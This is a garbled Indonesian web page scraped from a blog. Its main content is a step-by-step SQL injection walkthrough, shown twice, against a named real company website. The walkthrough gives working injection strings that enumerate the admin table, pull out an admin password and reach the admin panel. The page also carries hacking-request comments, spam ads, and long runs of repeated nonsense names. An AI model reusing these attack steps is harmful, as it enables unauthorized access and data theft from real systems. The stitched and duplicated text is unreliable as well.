Kalau Apakah Cara Deface Website Gack Admin Joomla Hack Password

Agus anin andi
nunus
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan…..

Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Special greets :
[+] www.neoteker.or.id
[+] www.bosen.net
[+] ftp_geo
[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7
Possibly related posts: (automatically generated)

Dermawan Rahasia
About : SQL Injection
SQL Injection Vol-1
SQL Injection #1
2007
02/06
CATEGORY
Security
Underground
Write comment
Write comment
Comments RSS
Trackback ( 0 )
Comments ( 29 )
pahlawan bertopeng
April 18th, 2007
REPLY QUOTE
Gimana sih caranya bobol web dengan mudah dan gampang

sihol
August 21st, 2007
REPLY QUOTE
thx for shared

sihol
August 21st, 2007
REPLY QUOTE
http://www.siholnet.com
yansen
September 20th, 2007
REPLY QUOTE
mas aku kesulitan dapat software untuk membagi bantwihts, boleh bagi aku situs yang gratis tuk
mendapatkannya, atau mas punya. bisa sharing ke aku ngak
master wong
REPLY QUOTE
coba bobol kuis telkomsel

vanudin
October 6th, 2007
REPLY QUOTE
coba cari di
http://www.patromax.com
beezsystem
October 30th, 2007
REPLY QUOTE
bisa bantu gak?

saya ingin dapet layanan unlimited talk dari indosat untuk wilayah jawa timur bisa kasih kode jalur
forntline nya gak?
terima kasih
diki
November 16th, 2007
REPLY QUOTE
aku perlu bantuan nih aku pemula yang lagi belajar vb net 2003 mau bikin database tapi
konenktingnya via odbc gimana yah
Shinchi
January 19th, 2008
REPLY QUOTE
Woww Kerenn…
mohon bimbingannya donk kk
Thx
-FuRkaN-
RyZack_The_RippeR
March 1st, 2008
REPLY QUOTE
Thx be4, 4 infonya…

Hyder
March 22nd, 2008
REPLY QUOTE
Hello,
Aku punya project ntuk hack laman web dan ganti info di dalamnya.
Kalau ada yang interest tolong eamil ke designcrop@yahoo.com

kazelpearl
May 10th, 2008
REPLY QUOTE
ma’af aku baru di bidang ini, bisa kirim tutorial lengkapnya nggak ke emailku
kazel_joe@yahoo.com.makasih ya mas
aink
August 29th, 2008
REPLY QUOTE
coba aja
japra
October 13th, 2008
REPLY QUOTE
masih bingung tp gua akan berusaha

Fery
January 21st, 2009
REPLY QUOTE
Maaf gua masih blum paham sepenuhnya..tolong lengkapi aplikasi beserta password dan
katerangnannya ke emailku..terima kasih sebelumnya…
Ronal Marado
February 6th, 2009
REPLY QUOTE
bisa kirim tutorial lengkap tentang hacker dan bobol web

cH1km0nK
February 7th, 2009
REPLY QUOTE
mas q ga ngerti mksdnya itu sql injectionNya

da tutor palink dasar ga mas
fakih
February 16th, 2009
REPLY QUOTE
wew kepanjangan bosss

Admin
February 16th, 2009
REPLY QUOTE
punya cara singkatnya?

silahkan di share disini
anaktetangga
March 3rd, 2009
REPLY QUOTE
kok tutiorialnya sama percis ama

sapa yang bener ?
tapi gak apa2 bagi2 ilmu
thx
Admin
March 3rd, 2009
REPLY QUOTE
terima kasih atas koreksinya. wkt itu saya dptnya dimilis. makanya nulisnya sumbernya kiriman
dari. tp skrg sdh saya rubah sumbernya.
badMAIL
March 21st, 2009
REPLY QUOTE
caranya belajar SQL duluh..kekekeke.. ntar klo dah nemu bermacam macam tabel dijadiin satu pasti
agak pusing.. ;p !!
richardo Sitompul
SQL Injection, step by step

By D-and
Published: April 25, 2007
/*********************************************************
* SQL Injection, step by step.
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?

Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id

Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject

dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box.

Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,

beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :

' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
--------------------
solikin tanti
sulashadi sariman
wardi warni
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
haris tini
awang haris
mulyani nuk
harjono
sumarto
solikin tanti
sulashadi sariman
wardi warni
agus wardi warni
sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
awang haris
mulyani nuk
harjono
sumarto
agus wardi warni

sariman
harjono mulyani
nuk wardi
agus sariman
widi sariman
yanti saeriman
dias sariman
rangking
100000000000 se
solo
married and drink
solikin tanti
sulashadi sariman
wardi warni
'T_ADMIN.PASSWORD' is invalid in the select list because

--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek

field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-

field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :

' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :

' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
--------------------
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang

berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,

untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
--------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :

' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.

Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
'tb_news.NewsId' is invalid in the select list because
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan

pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack

oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
Yah itulah mungkin yang dapat saya ceritakan.....

Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Just kidding )
awang haris
Referensi :
mulyani nuk
harjono
sumarto
BELAJAR (Jangan pernah berhenti belajar)

news, library, tutorial, motivation
HOME
About
Bobol Web dengan Step-by-Step SQL Injection
Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan
teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan
step by step SQL Injection ini yang diambil dari langsung tulisan iko (iko94@yahoo.com)
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject

dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk
admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0×80040E14)
‘T_ADMIN.NOMOR’ is invalid in the select list because
——————–
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,

beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
‘ group by T_ADMIN.NOMOR having 1=1–
——————–
‘T_ADMIN.NIP’ is invalid in the select list because
——————–
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :

‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–
——————–
‘T_ADMIN.PASSWORD’ is invalid in the select list because
——————–
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek

field terakhir dengan meng-inject:
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1–
(catatan : kalimat harus 1 baris, tidak dipotong)
——————–
- NIP atau Password atau Unit Anda salah !! -
——————–
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-

field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :

‘ union select sum(NOMOR) from T_ADMIN–
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
——————–
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
——————–
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :

‘ union select sum(NIP) from T_ADMIN–
——————–
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
——————–
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
‘ union select sum(nama_kolom) from T_ADMIN–
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,

untuk user admin, dengan meng-inject :
‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–
artinya kita memilih minimum nama user yang lebih besar dari ‘a’
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
——————–
error converting the varchar value ‘bill ‘ to
a column of data type int.
——————–
Anda lihat :
varchar value ‘bill ‘
‘bill’ itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :

‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = ‘bill’–
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
———————
error converting the nvarchar value ‘m@mpusk@u’ to a
column of data type int.
———————
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja….
Kita inject-kan :
‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA =’bill’–
catatan : harus satu baris.
Duarrrrrr……….
Glhodhak………….
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.

Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–
akan keluar pesan error :
—————————
‘tb_news.NewsId’ is invalid in the select list because
/dari_Media.asp, line 58
—————————
artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan

pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack

oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
awang
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
haris mulyani
nuk harjono
sumarto
******************************************************
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
Yah itulah mungkin yang dapat saya ceritakan…..

Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Just kidding )
Referensi :
Special greets :
[+] www.neoteker.or.id
[+] www.bosen.net
[+] ftp_geo
[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
Possibly related posts: (automatically generated)

Dermawan Rahasia
About : SQL Injection
SQL Injection Vol-1
SQL Injection #1
2007
02/06
CATEGORY
Security
Underground
Write comment
Write comment
Comments RSS
Trackback ( 0 )
Comments ( 29 )
pahlawan bertopeng
April 18th, 2007
REPLY QUOTE
Gimana sih caranya bobol web dengan mudah dan gampang

sihol
August 21st, 2007
REPLY QUOTE
thx for shared

sihol
August 21st, 2007
REPLY QUOTE
http://www.siholnet.com
yansen
REPLY QUOTE
mas aku kesulitan dapat software untuk membagi bantwihts, boleh bagi aku situs yang gratis tuk
mendapatkannya, atau mas punya. bisa sharing ke aku ngak
master wong
REPLY QUOTE
coba bobol kuis telkomsel

vanudin
October 6th, 2007
REPLY QUOTE
coba cari di
http://www.patromax.com
beezsystem
October 30th, 2007
REPLY QUOTE
bisa bantu gak?

saya ingin dapet layanan unlimited talk dari indosat untuk wilayah jawa timur bisa kasih kode jalur
forntline nya gak?
terima kasih
diki
November 16th, 2007
REPLY QUOTE
aku perlu bantuan nih aku pemula yang lagi belajar vb net 2003 mau bikin database tapi
konenktingnya via odbc gimana yah
Shinchi
January 19th, 2008
REPLY QUOTE
Woww Kerenn…
mohon bimbingannya donk kk
Thx
-FuRkaN-
RyZack_The_RippeR
March 1st, 2008
REPLY QUOTE
Thx be4, 4 infonya…

Hyder
March 22nd, 2008
REPLY QUOTE
Hello,
Aku punya project ntuk hack laman web dan ganti info di dalamnya.
Kalau ada yang interest tolong eamil ke designcrop@yahoo.com

kazelpearl
May 10th, 2008
REPLY QUOTE
ma’af aku baru di bidang ini, bisa kirim tutorial lengkapnya nggak ke emailku
kazel_joe@yahoo.com.makasih ya mas
aink
August 29th, 2008
REPLY QUOTE
coba aja
japra
October 13th, 2008
REPLY QUOTE
masih bingung tp gua akan berusaha

Fery
January 21st, 2009
REPLY QUOTE
Maaf gua masih blum paham sepenuhnya..tolong lengkapi aplikasi beserta password dan
katerangnannya ke emailku..terima kasih sebelumnya…
Ronal Marado
February 6th, 2009
REPLY QUOTE
bisa kirim tutorial lengkap tentang hacker dan bobol web

cH1km0nK
February 7th, 2009
REPLY QUOTE
mas q ga ngerti mksdnya itu sql injectionNya

da tutor palink dasar ga mas
fakih
February 16th, 2009
REPLY QUOTE
wew kepanjangan bosss

Admin
February 16th, 2009
REPLY QUOTE
punya cara singkatnya?

silahkan di share disini
anaktetangga
March 3rd, 2009
REPLY QUOTE
kok tutiorialnya sama percis ama

sapa yang bener ?
tapi gak apa2 bagi2 ilmu
thx
Admin
March 3rd, 2009
REPLY QUOTE
terima kasih atas koreksinya. wkt itu saya dptnya dimilis. makanya nulisnya sumbernya kiriman
dari. tp skrg sdh saya rubah sumbernya.
badMAIL
March 21st, 2009
REPLY QUOTE
caranya belajar SQL duluh..kekekeke.. ntar klo dah nemu bermacam macam tabel dijadiin satu pasti
agak pusing.. ;p !!
richardo Sitompul
May 6th, 2009
REPLY QUOTE
waduh mas ribet amat c…aq masih ga ngerti

mas..pusing..ada cara yang lebih mudah ga
blajr sql_injection nya?aq pengen ngerti mas.
mksih..blz ke email aq ya mas..
Admin
May 6th, 2009
REPLY QUOTE
coba kunjungi http://jasakom.com

disitu lengkap
Lamerz
June 17th, 2009
REPLY QUOTE
Aq pengen yg php inject boz.

monx
July 8th, 2009
REPLY QUOTE
sip…
makasih infonya…
seno,,
July 23rd, 2009
REPLY QUOTE
mas aq pendatang bbaru juga,,,

jadi haruss banyak belajar,,,
jadi mas,, tolong bagi2 ilmunya donkk,,
aq pengen belajar dari awall,,
menurut mas yang baru belajar cocoknya belajar dari mana dulu y,,,,
Hacker QLL3R
REPLY QUOTE
wadoh bingung gw
panjang bgt
Hacker QLL3R
REPLY QUOTE
Bingung gw cara nya susah bgt

NAME( required )
E-MAIL( required ) - will not be published -
URL
Notify me of follow-up comments via email.
Notify me of new posts via email.

Belajar
Information is FREE
RSS FEED
Disclaimer:
Nor the author or the host of this blog is any way related to the contents available. This site does not
host any copyright infringing contents on its server. This website is a compilation of the resources
available from the Internet. We only index and link to content provided by other websites. If you
have any issues regarding copyright, please contact us and we will remove offending contents
ASAP.
All other trademarks are the sole property of their respective owners.
Categories
Top Posts
Arti Definisi / Pengertian Pemasaran Menurut Para Ahli
Mencegah Pengaruh Negatif Internet Terhadap Perkembangan Seksualitas Anak
Daftar Gaji PNS 2010 Setiap Golongan
Kursus Bahasa Inggris Gratis
Makna Kata Ulang Dalam Bahasa Indonesia - Arti Pengertian Perulangan Kata
Recent Posts
Gratis, Try Out Online untuk Pelajar SD di Indismart
Komunitas Lowongan Kerja (VACANCY)
CPSSoft
PT. Equity Life Indonesia
PT Midas Solusi Utama
Recent Comments Admin on Cara Belajar Cepat Membaca, Me…
Budisastro on Cara Belajar Cepat Membaca, Me…
heri on Makna Kata Ulang Dalam Bahasa …
thechatter on Free Magazine Style Theme The…
hary on JakPromo – Website Iklan…
Top Clicks
bisnis.vivanews.com/news/…
chabelita.biz/component/c…
tvone.co.id/berita/view/2…
suhanto.com/2009/08/magen…
en.wordpress.com/tag/info…
Sejak Agustus 2006, Anda adalah pengunjung ke :
Category Cloud
Access Arsitek & Teknik Sipil ASCII Bahasa Download Fisika Free Wordpress Theme Hardware
Indonesia Info Lowongan Islam Kata Library Stuff Linux Matematika Misc Motivasi News Oracle
Photoshop PHP Programming Security Situs Software SQL Tips Underground Windows Word
Tags
arsitek Download Hardware library Linux lowongan Motivasi News PHP pustakawan Security site
Software SQL Tips wordpress
detikInet
Kapasitas Blu-ray Tembus 128GB
Gears of War 3 Suguhkan Gaya Bertempur Baru
Aplikasi 'Twitter for BlackBerry' Versi Beta Dirilis
Game Kerajaan China Siap Open Beta di Indonesia
ScanSnap S1300, Pemindai Bergerak dengan Fitur Cerdas
Siap-Siap Ikuti Kompetisi TI Nasional
Google Maps 4.0 Sambangi BlackBerry
Bos Teknologi Yahoo Mundur
Deretan Tablet Android Siap Gempur iPad
RIM Tangkis Hoax BBM di Amerika dan Asia
Tabloid PC Plus – Trik
Dirilis, Twitter for BlackBerry Versi Public Beta
Wuih, Intel Bagi-bagi Sampel Eksperimen Chip 48-Core
WD Hadirkan Hard Disk Notebook 750 GB
Yuk, Jadi Bos Perusahaan Operator Telekomunikasi
Mahir Bikin Blog, Portal, dan Forum
Gilee, Ponsel ini Bisa Standby 1 Bulan!
12 Juta Pengguna Pakai Linux Ubuntu
Hitachi Gandakan Usia Baterai Li-Ion
Ongkos Produksi iPad 260 Dolar
Ck..ck..ck… 15 Ribu Dolar untuk Boneka Kelinci Energizer
RSS-nya BELAJAR
RSS - Posts
Blog at WordPress.com. | Theme: Monochrome by mono-lab

Pasang Iklan Baris Gratis Tanpa Daftar Online,Tanpa Quota & Tanpa Login | Iklan Percuma | Free
Classifieds Ads
Home Kontak Kami Tentang Kami Pasang Iklan Premium Pasang Iklan Link
Cari Iklan
Seluruh konten dari website ini merupakan kontribusi dari para pemasang iklan. Isi iklan
merupakan tanggung jawab pemasang iklan. Karena itu dimohon untuk berhati-hati sebelum
menindaklanjuti iklan yang Anda minati. !!
KOMUNITAS SEX KOTA SOLO

Dipasang Tgl: 24 November 2008 | Kategori: Kontak Jodoh
Mau tau komunitas sex dikota solo….?liaht di www.solosec.com

Jadilah anggota tetap…………………….di komuntas ini
http://www.solosec.comInfo Iklan
Keywords Iklan: komunitas, kota, sex, solo
Iklan Premium
Bisnis Terbaru Tahun 2010 , Keajaiban Bisnis E-MIRACLE
Dibaca: 174 kali | Kategori: Bisnis Online
Bersama meraih sukses yang penuh barokah. Saatnya kita Sukses Dunia dan Akhirat ; > Ajak >
Rawat > Dan beri Uswatun Hasanah Dalam Multi Level Tahajut, Multi Level Dhuha, Multi Level
Dhuha , dan lain2 Bersama Ust. Yusuf Mansyur
Dapatkan web Replika Canggih untuk Bisnis Pulsa DBS
Saatnya mengembangkan jaringan bisnis pulsa dari PT.DFI (duta4future.com) online lewat internet,
dapatkan member baru dari seluruh pelosok nusantara tanpa harus bertemu langsung dgn mereka.
Cukup bergabung dg tim online kami maka anda akan mendapatkan web replika canggih yang bisa
anda promosikan di internet selanjutnya biarkan sistem yg bekerja 24 jam,7hari seminggu, semua
otomatis dan mudah. buktikan di www.aktivasidbs.com/?id=sarlykolit.
www.LEMBAH.com GRATIS TRIK RAIH 1,8JUTA SEHARI !!!
Dibaca: 8,763 kali | Kategori: Bisnis Online
Kami beri bukti, bukan omong besar!!! Bukti nyata raih Rp.1,8 juta ($180) sehari! Baca rahasianya
dan lihat buktinya hanya di http://www.lembah.com
RAHASIA TERHEBAT mendapatkan uang Rp. 10.000.000 dan isi ulang pulsa GRATIS Rp.
1.000.000 kurang dari 24 JAM
